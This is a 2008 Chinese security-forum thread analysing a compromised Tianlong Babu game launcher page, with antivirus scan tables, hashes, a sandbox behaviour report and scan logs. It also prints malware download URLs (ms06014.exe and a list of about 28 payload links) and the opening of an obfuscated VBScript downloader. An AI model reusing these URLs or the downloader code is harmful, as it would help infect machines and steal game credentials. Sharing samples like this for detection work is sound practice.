天龙八部网游脚本再一次出错，又一次挂上小马~~~见13楼！

显示全部楼层 · 发表于 2008-7-28 13:19:41

天龙八部网游脚本出错，一看不是搜狐的。。。

原来被挂马了。。。又过卡巴斯基和NOD32，晕，没有安装这个游戏的，可直接访问ht　tp://tl.sohu.com/content/launcher/fragment/gonggao.inc，但我发上来后，费尔不报了。。

文件 001.rar 接收于 2008.07.28 07:06:05 (CET)
反病毒引擎版本最后更新扫描结果
AhnLab-V3 2008.7.26.0 2008.07.28 -
AntiVir 7.8.1.12 2008.07.26 HTML/Rce.Gen
Authentium 5.1.0.4 2008.07.28 -
Avast 4.8.1195.0 2008.07.27 VBS:Obfuscated-gen
AVG 8.0.0.130 2008.07.27 JS/Downloader.Agent
BitDefender 7.2 2008.07.28 Trojan.Downloader.VBS.CF
CAT-QuickHeal 9.50 2008.07.25 -
ClamAV 0.93.1 2008.07.28 JS.Psyme-36
DrWeb 4.44.0.09170 2008.07.27 -
eSafe 7.0.17.0 2008.07.27 -
eTrust-Vet 31.6.5983 2008.07.26 -
Ewido 4.0 2008.07.27 Downloader.AniLoad.nae
F-Prot 4.4.4.56 2008.07.28 -
F-Secure 7.60.13501.0 2008.07.28 VBS/Psyme.BF
Fortinet 3.14.0.0 2008.07.26 -
GData 2.0.7306.1023 2008.07.28 VBS:Obfuscated-gen
Ikarus T3.1.1.34.0 2008.07.28 -
Kaspersky 7.0.0.125 2008.07.28 -
McAfee 5347 2008.07.25 -
Microsoft 1.3704 2008.07.28 TrojanDownloader:VBS/Psyme.gen!D
NOD32v2 3301 2008.07.27 -
Norman 5.80.02 2008.07.25 -
Panda 9.0.0.4 2008.07.27 -
PCTools 4.4.2.0 2008.07.27 HTML.Psyme.Gen
Prevx1 V2 2008.07.28 -
Rising 20.54.62.00 2008.07.27 -
Sophos 4.31.0 2008.07.28 -
Sunbelt 3.1.1536.1 2008.07.25 -
Symantec 10 2008.07.28 -
TheHacker 6.2.96.389 2008.07.25 -
TrendMicro 8.700.0.1004 2008.07.28 -
VBA32 3.12.8.1 2008.07.27 -
ViRobot 2008.7.26.1311 2008.07.28 -
VirusBuster 4.5.11.0 2008.07.27 HTML.Psyme.Gen
Webwasher-Gateway 6.6.2 2008.07.28 Script.Rce.Gen
附加信息
File size: 2056 bytes
MD5...: 91519926ea40dd6e310e195112e26ac0
SHA1..: 7daf1a34dafcfcb1a03182ff843b961d7c05cd58
SHA256: b9693a6e54feacf4245f89558c13c7f5b1856da7f6610181fde0e920d82f151c
SHA512: bcb48a7b97bff2791103d8d35eafebd0dc7a7b2d658c2d4fe44bc3d16d7d504c
3d9b62a1480a4b0bd3ef3037160159c928ddb147b199b59c449025e382cbe344
PEiD..: -
PEInfo: -

VirSCAN.org Scanned Report :
Scanned time : 2008/07/28 13:08:17 (CST)
Scanner results: 25%的杀软(9/36)报告发现病毒
File Name    : 001.rar
File Size    : 2056 byte
File Type    : RAR archive data, v1d, os
MD5          : 91519926ea40dd6e310e195112e26ac0
SHA1          : 7daf1a34dafcfcb1a03182ff843b961d7c05cd58
Online report  : ht　tp://virscan.org/report/210ed8f9fa5b85afba91d27e994d8461.html

Scanner       Engine Ver    Sig Ver          Sig Date Time Scan result
a-squared    3.5.0.22       2008.07.27       2008-07-27  3.65 -
安博士V3    2008.07.28.00 2008.07.28       2008-07-28  0.94 -
AntiVir       7.8.1.12       7.0.5.176       2008-07-26  2.13 HTML/Rce.Gen
Arcavir       1.0.5          200807271037    2008-07-27  1.16 -
AVAST!       3.0.1          080727-0       2008-07-27  0.00 VBS:Obfuscated-gen [Trj]
AVG          7.5.51.442    270.5.6/1576    2008-07-27  1.49 -
BitDefender 7.60825.1403661 7.20235          2008-07-28  2.64 Trojan.Downloader.VBS.CF
CA (VET)    9.0.0.143    31.6.5983       2008-07-26  0.63 -
ClamAV       0.93.3       7856             2008-07-28  0.00 JS.Psyme-36
Comodo       2.11          2.0.0.598       2008-07-27  0.39 -
CP Secure    1.1.0.715    2008.07.26       2008-07-26  5.49 Troj.Downloader.JS.Psyme.aw
Dr.Web       4.44.0.9170    2008.07.27       2008-07-27  3.04 -
ewido       4.0.0.2       2008.07.27       2008-07-27  3.49 Downloader.AniLoad.nae
F-Prot       4.4.4.56       20080727       2008-07-27  0.98 -
F-Secure    5.51.6100    2008.07.27.02    2008-07-27  0.03 -
飞塔          2.81-3.11    9.358          2008-07-27  1.61 -
ViRobot       20080728       2008.07.28       2008-07-28  0.40 -
Ikarus       T3.1.01.34    2008.07.27.71173  2008-07-27  3.07 -
江民杀毒    11.0.706       2008.07.27       2008-07-27  1.17 -
卡巴斯基    5.5.10       2008.07.28       2008-07-28  0.02 -
金山毒霸    2008.1.14.15 2008.7.28.10    2008-07-28  0.97 -
迈克菲       5.2.00       5347             2008-07-25  2.18 -
Microsoft    1.3704       2008.07.27       2008-07-27  4.94 TrojanDownloader:VBS/Psyme.gen!D
mks_vir       2.01          2008.07.27       2008-07-27  2.41 -
Norman       5.93.01       5.93.00          2008-07-25  4.56 VBS/Psyme.BF
熊猫卫士    9.05.01       2008.07.27       2008-07-27  1.83 -
趋势科技    8.700-1004    5.438.01       2008-07-27  0.03 -
Quick Heal    9.50          2008.07.25       2008-07-25  1.57 -
瑞星          20.0          20.54.62.00    2008-07-27  0.28 -
Sophos       2.75.4       4.31             2008-07-28  1.91 -
Sunbelt       3.1.1536.1    2166             2008-07-25  1.31 -
赛门铁克    1.3.0.24       20080727.004    2008-07-27  0.40 -
nProtect    2008-07-25.00 1702673          2008-07-25  3.20 -
The Hacker    6.2.96       v00389          2008-07-24  0.37 -
VBA32       3.12.8.1       20080727.0928    2008-07-27  1.11 -
VirusBuster 4.5.11.10    10.82.24/596856 2008-07-27  0.78 HTML.Psyme.Gen

文件 002.rar 接收于 2008.07.28 07:08:26 (CET)
反病毒引擎版本最后更新扫描结果
AhnLab-V3 2008.7.26.0 2008.07.28 -
AntiVir 7.8.1.12 2008.07.26 HTML/Rce.Gen
Authentium 5.1.0.4 2008.07.28 -
Avast 4.8.1195.0 2008.07.27 VBS:Obfuscated-gen
AVG 8.0.0.130 2008.07.27 JS/Downloader.Agent
BitDefender 7.2 2008.07.28 Trojan.Downloader.VBS.CF
CAT-QuickHeal 9.50 2008.07.25 -
ClamAV 0.93.1 2008.07.28 JS.Psyme-36
DrWeb 4.44.0.09170 2008.07.27 -
eSafe 7.0.17.0 2008.07.27 -
eTrust-Vet 31.6.5983 2008.07.26 -
Ewido 4.0 2008.07.27 Downloader.AniLoad.nae
F-Prot 4.4.4.56 2008.07.28 -
F-Secure 7.60.13501.0 2008.07.28 VBS/Psyme.BF
Fortinet 3.14.0.0 2008.07.26 -
GData 2.0.7306.1023 2008.07.28 VBS:Obfuscated-gen
Ikarus T3.1.1.34.0 2008.07.28 -
Kaspersky 7.0.0.125 2008.07.28 -
McAfee 5347 2008.07.25 -
Microsoft 1.3704 2008.07.28 TrojanDownloader:VBS/Psyme.gen!D
NOD32v2 3301 2008.07.27 -
Norman 5.80.02 2008.07.25 -
Panda 9.0.0.4 2008.07.27 -
PCTools 4.4.2.0 2008.07.27 HTML.Psyme.Gen
Prevx1 V2 2008.07.28 -
Rising 20.54.62.00 2008.07.27 -
Sophos 4.31.0 2008.07.28 -
Sunbelt 3.1.1536.1 2008.07.25 -
Symantec 10 2008.07.28 -
TheHacker 6.2.96.389 2008.07.25 -
TrendMicro 8.700.0.1004 2008.07.28 -
VBA32 3.12.8.1 2008.07.27 -
ViRobot 2008.7.26.1311 2008.07.28 -
VirusBuster 4.5.11.0 2008.07.27 HTML.Psyme.Gen
Webwasher-Gateway 6.6.2 2008.07.28 Script.Rce.Gen
附加信息
File size: 2061 bytes
MD5...: d6b3cba483ed4abf5323dd0cbb7f84bf
SHA1..: 0df7244e770897d7d17f1288e2ea8e65b25f48ba
SHA256: 36ebf8a270f7bb55b11cb02bc6814a6ffc96bc498b09a6f3d3ee987ac54013d3
SHA512: 28353a9d322dad19e47098b1c316dc48a7efae960cd5a39a3fc03d6b30f5d35b
f3c471ea3ce0072626625ca0ba680859799c964162726a2dda38fce4eba45dd2
PEiD..: -
PEInfo: -

VirSCAN.org Scanned Report :
Scanned time : 2008/07/28 13:12:06 (CST)
Scanner results: 25%的杀软(9/36)报告发现病毒
File Name    : 002.rar
File Size    : 2061 byte
File Type    : RAR archive data, v1d, os
MD5          : d6b3cba483ed4abf5323dd0cbb7f84bf
SHA1          : 0df7244e770897d7d17f1288e2ea8e65b25f48ba
Online report  : ht　tp://virscan.org/report/79ac7081622d185518b21c9c8bb28589.html

Scanner       Engine Ver    Sig Ver          Sig Date Time Scan result
a-squared    3.5.0.22       2008.07.27       2008-07-27  2.32 -
安博士V3    2008.07.28.00 2008.07.28       2008-07-28  0.86 -
AntiVir       7.8.1.12       7.0.5.176       2008-07-26  2.12 HTML/Rce.Gen
Arcavir       1.0.5          200807271037    2008-07-27  1.15 -
AVAST!       3.0.1          080727-0       2008-07-27  0.00 VBS:Obfuscated-gen [Trj]
AVG          7.5.51.442    270.5.6/1576    2008-07-27  1.49 -
BitDefender 7.60825.1403661 7.20235          2008-07-28  2.64 Trojan.Downloader.VBS.CF
CA (VET)    9.0.0.143    31.6.5983       2008-07-26  0.60 -
ClamAV       0.93.3       7856             2008-07-28  0.00 JS.Psyme-36
Comodo       2.11          2.0.0.598       2008-07-27  0.41 -
CP Secure    1.1.0.715    2008.07.26       2008-07-26  5.51 Troj.Downloader.JS.Psyme.aw
Dr.Web       4.44.0.9170    2008.07.27       2008-07-27  3.04 -
ewido       4.0.0.2       2008.07.27       2008-07-27  2.39 Downloader.AniLoad.nae
F-Prot       4.4.4.56       20080727       2008-07-27  0.96 -
F-Secure    5.51.6100    2008.07.27.02    2008-07-27  2.81 -
飞塔          2.81-3.11    9.358          2008-07-27  1.61 -
ViRobot       20080728       2008.07.28       2008-07-28  0.40 -
Ikarus       T3.1.01.34    2008.07.27.71173  2008-07-27  3.08 -
江民杀毒    11.0.706       2008.07.27       2008-07-27  1.14 -
卡巴斯基    5.5.10       2008.07.28       2008-07-28  0.02 -
金山毒霸    2008.1.14.15 2008.7.28.10    2008-07-28  0.64 -
迈克菲       5.2.00       5347             2008-07-25  2.18 -
Microsoft    1.3704       2008.07.27       2008-07-27  4.52 TrojanDownloader:VBS/Psyme.gen!D
mks_vir       2.01          2008.07.27       2008-07-27  2.44 -
Norman       5.93.01       5.93.00          2008-07-25  4.61 VBS/Psyme.BF
熊猫卫士    9.05.01       2008.07.27       2008-07-27  1.92 -
趋势科技    8.700-1004    5.438.01       2008-07-27  0.02 -
Quick Heal    9.50          2008.07.25       2008-07-25  1.57 -
瑞星          20.0          20.54.62.00    2008-07-27  0.24 -
Sophos       2.75.4       4.31             2008-07-28  1.89 -
Sunbelt       3.1.1536.1    2166             2008-07-25  0.39 -
赛门铁克    1.3.0.24       20080727.004    2008-07-27  0.19 -
nProtect    2008-07-25.00 1702673          2008-07-25  3.10 -
The Hacker    6.2.96       v00389          2008-07-24  0.37 -
VBA32       3.12.8.1       20080727.0928    2008-07-27  1.11 -
VirusBuster 4.5.11.10    10.82.24/596856 2008-07-27  0.78 HTML.Psyme.Gen

[ 本帖最后由小飞侠.net 于 2008-7-30 23:31 编辑 ]

显示全部楼层 · 发表于 2008-7-28 13:22:18

http://user1.16-22.net/ms06014.exe

显示全部楼层 · 发表于 2008-7-28 13:41:26

2008-7-28 13:41:19 HTTP filter file http://user1.16-22.net/ms06014.exe probably unknown NewHeur_PE virus connection terminated - quarantined 3A8AD2D60C484EE\Administrator Threat was detected upon access to web by the application: C:\Program Files\Internet Explorer\iexplore.exe.

显示全部楼层 · 发表于 2008-7-28 13:45:48

难道又是RPWT..

显示全部楼层 · 发表于 2008-7-28 14:20:20

Submission Summary:
Submission details:
Submission received: 28 July 2008, 16:13:17
Processing time: 4 min 17 sec
Submitted sample:
File MD5: 0xF14C97C14E3DEBF50470A0D9F1381D16
Filesize: 9,216 bytes
Alias: Downloader-BDH [McAfee]
Summary of the findings:
What's been found Severity Level
Downloads/requests other files from Internet.

Technical Details:

File System Modifications

The following file was created in the system:
# Filename(s) File Size File MD5 Alias
1 %System%\elbfycgyx\lsass.exe
[file and pathname of the sample #1] 9,216 bytes 0xF14C97C14E3DEBF50470A0D9F1381D16 Downloader-BDH [McAfee]

Note:
%System% is a variable that refers to the System folder. By default, this is C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), or C:\Windows\System32 (Windows XP).
The following directory was created:
%System%\elbfycgyx

Memory Modifications

There was a new process created in the system:
Process Name Process Filename Main Module Size
[filename of the sample #1] [file and pathname of the sample #1] 16,384 bytes

Registry Modifications

The following Registry Key was created:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{1402bf3d-9c8a-e1df-e1df-ad9b48c6fb3a}
The newly created Registry Value is:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{1402bf3d-9c8a-e1df-e1df-ad9b48c6fb3a}]
StubPath = "%System%\elbfycgyx\lsass.exe /t"

Other details

To mark the presence in the system, the following Mutex object was created:
{1402bf3d-9c8a-e1df-e1df-ad9b48c6fb3a}
The following Internet downloads were started (the retrieved bits are saved into the local file):
URL to be downloaded Filename for the downloaded bits
http://6e2b4.swhmzq.com/721/?n=08072101&id=00cd1a5f0000000000000000&t=ms06014&i=0 c:\bt.txt
http://e5b2c.swhmzq.com/721/?n=08072101&id=00cd1a5f0000000000000000&t=ms06014&i=0 c:\z.dat

分析报告：ht　tp://www.threatexpert.com/report.aspx?md5=f14c97c14e3debf50470a0d9f1381d16

显示全部楼层 · 发表于 2008-7-28 18:10:40

[oo]
c0=http://2be37c5f.3f6e2cc5f0b.com/hai.exe
c1=http://2be37c5f.3f6e2cc5f0b.com/01.exe
c2=http://2be37c5f.3f6e2cc5f0b.com/01B.exe
c3=http://2be37c5f.3f6e2cc5f0b.com/02.exe
c4=http://2be37c5f.3f6e2cc5f0b.com/03.exe
c5=http://2be37c5f.3f6e2cc5f0b.com/04.exe
c6=http://2be37c5f.3f6e2cc5f0b.com/04B.exe
c7=http://2be37c5f.3f6e2cc5f0b.com/05.exe
c8=http://2be37c5f.3f6e2cc5f0b.com/06.exe
c9=http://2be37c5f.3f6e2cc5f0b.com/07.exe
c10=http://2be37c5f.3f6e2cc5f0b.com/08.exe
c11=http://2be37c5f.3f6e2cc5f0b.com/09.exe
c12=http://2be37c5f.3f6e2cc5f0b.com/10.exe
c13=http://2be37c5f.3f6e2cc5f0b.com/11.exe
c14=http://2be37c5f.3f6e2cc5f0b.com/12.exe
c15=http://2be37c5f.3f6e2cc5f0b.com/13.exe
c16=http://2be37c5f.3f6e2cc5f0b.com/14.exe
c17=http://2be37c5f.3f6e2cc5f0b.com/15.exe
c18=http://2be37c5f.3f6e2cc5f0b.com/16.exe
c19=http://2be37c5f.3f6e2cc5f0b.com/17.exe
c20=http://2be37c5f.3f6e2cc5f0b.com/18.exe
c21=http://2be37c5f.3f6e2cc5f0b.com/19.exe
c22=http://2be37c5f.3f6e2cc5f0b.com/20.exe
c23=http://2be37c5f.3f6e2cc5f0b.com/21.exe
c24=http://2be37c5f.3f6e2cc5f0b.com/22.exe
c25=http://2be37c5f.3f6e2cc5f0b.com/23.exe
c26=http://2be37c5f.3f6e2cc5f0b.com/27.exe
c27=http://2be37c5f.3f6e2cc5f0b.com/m4.exe

复制代码

显示全部楼层 · 发表于 2008-7-28 18:13:13

/*
*/
<html>
<body>
</body>
<script language=VBScript>
On Error Resume Next
dubasbaddressssssssss = "http://user1.16-22.net/ms06014.exe"
dubasbobj="o"
dubasbobjs="b"
dubasbobjss="j"
dubasbobjsss="e"
dubasbobjssss="c"
dubasbobjsssss="t"

…………………………………………………………（等等）

显示全部楼层 · 发表于 2008-7-28 18:37:20

我来帮打包把

显示全部楼层 · 发表于 2008-7-28 20:12:49

McAfee 报了10个。。。

显示全部楼层 · 发表于 2008-7-28 20:18:45

[Scanning : C:\Download Files]

C:\Download Files\打包.rar<RAR>:01.exe <- Trojan.Agent.Uxi : No action
C:\Download Files\打包.rar<RAR>:02.exe <- Trojan.Agent.Udd : No action
C:\Download Files\打包.rar<RAR>:02.exe<UPX>:02.exe<DLLRES>:res0.exe <- Trojan.Agent.Von : No action
C:\Download Files\打包.rar<RAR>:04.exe<UPack>:04.exe<DLLRES>:res0.exe <- Trojan.Gamethief.Onlinegames.Siyp : No action
C:\Download Files\打包.rar<RAR>:05.exe<UPack>:05.exe<DLLRES>:res0.exe <- Trojan.Psw.Onlinegames.Rxvq : No action
C:\Download Files\打包.rar<RAR>:10.exe<UPX>:10.exe<DLLRES>:res0.exe <- Trojan.Spy.Agent.Dhi : No action
C:\Download Files\打包.rar<RAR>:16.exe <- Trojan.Agent.Rzv : No action
C:\Download Files\打包.rar<RAR>:18.exe <- Trojan.Agent.Sav : No action
C:\Download Files\打包.rar<RAR>:19.exe<UPX>:19.exe<DLLRES>:res0.exe <- Trojan.Psw.Games.Onlinegames.Sijx : No action

Scanned objects : 72

Infected objects : 9

[已鉴定] 天龙八部网游脚本再一次出错，又一次挂上小马~~~见13楼！

挂的很明显，楼上兄弟没打包！

ArcaVir2008